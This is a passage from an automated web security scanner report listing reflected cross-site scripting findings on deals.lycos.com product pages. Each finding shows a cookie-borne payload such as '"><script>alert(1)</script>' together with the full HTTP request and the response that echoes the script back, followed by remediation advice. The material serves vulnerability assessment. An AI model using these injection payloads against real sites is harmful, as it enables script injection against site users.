Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f572"><script>alert(1)</script>12d99f9dda4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f572"><script>alert(1)</script>12d99f9dda4&amp;cj=1" alt="tracker" />
...[SNIP]...

1.170. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b9b"%3balert(1)//d6f0902539e was submitted in the diktfc cookie. This input was echoed as e7b9b";alert(1)//d6f0902539e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae7b9b"%3balert(1)//d6f0902539e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae7b9b";alert(1)//d6f0902539e"
});
</script>
...[SNIP]...

1.171. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a834a"%3balert(1)//5a3d78b4e4f was submitted in the diktfc cookie. This input was echoed as a834a";alert(1)//5a3d78b4e4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa834a"%3balert(1)//5a3d78b4e4f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
vascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa834a";alert(1)//5a3d78b4e4f"
});
</script>
...[SNIP]...

1.172. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a58"><script>alert(1)</script>e26ae126c13 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35a58"><script>alert(1)</script>e26ae126c13; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35a58"><script>alert(1)</script>e26ae126c13&amp;cj=1" alt="tracker" />
...[SNIP]...

1.173. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b8b4"%3balert(1)//6666cd16315 was submitted in the diktfc cookie. This input was echoed as 3b8b4";alert(1)//6666cd16315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b8b4"%3balert(1)//6666cd16315; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:41 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
>
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b8b4";alert(1)//6666cd16315"
});
</script>
...[SNIP]...

1.174. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dfde"><script>alert(1)</script>8551183e611 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2dfde"><script>alert(1)</script>8551183e611; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2dfde"><script>alert(1)</script>8551183e611&amp;cj=1" alt="tracker" />
...[SNIP]...

1.175. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/digital-blue-carabiner-digital-camera-for-3-413838

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d57"%3balert(1)//40027816f73 was submitted in the diktfc cookie. This input was echoed as 15d57";alert(1)//40027816f73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/digital-blue-carabiner-digital-camera-for-3-413838 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A15d57"%3balert(1)//40027816f73; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:18 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
>
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A15d57";alert(1)//40027816f73"
});
</script>
...[SNIP]...

1.176. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/digital-blue-carabiner-digital-camera-for-3-413838

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e75"><script>alert(1)</script>1d919f1ca71 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/digital-blue-carabiner-digital-camera-for-3-413838 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82e75"><script>alert(1)</script>1d919f1ca71; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82e75"><script>alert(1)</script>1d919f1ca71&amp;cj=1" alt="tracker" />
...[SNIP]...

1.177. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/drawn-the-painted-tower-for-ipad-for-5-414364

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff58e"%3balert(1)//2eff680c602 was submitted in the diktfc cookie. This input was echoed as ff58e";alert(1)//2eff680c602 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/drawn-the-painted-tower-for-ipad-for-5-414364 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aff58e"%3balert(1)//2eff680c602; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aff58e";alert(1)//2eff680c602"
});
</script>
...[SNIP]...

1.178. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/drawn-the-painted-tower-for-ipad-for-5-414364

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6006c"><script>alert(1)</script>104c0231a35 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/drawn-the-painted-tower-for-ipad-for-5-414364 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6006c"><script>alert(1)</script>104c0231a35; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6006c"><script>alert(1)</script>104c0231a35&amp;cj=1" alt="tracker" />
...[SNIP]...

1.179. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/element-40-1080p-lcd-hdtv-350-414616

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2e8f"%3balert(1)//4a914e95c2b was submitted in the diktfc cookie. This input was echoed as c2e8f";alert(1)//4a914e95c2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/element-40-1080p-lcd-hdtv-350-414616 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac2e8f"%3balert(1)//4a914e95c2b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
xt/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac2e8f";alert(1)//4a914e95c2b"
});
</script>
...[SNIP]...

1.180. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
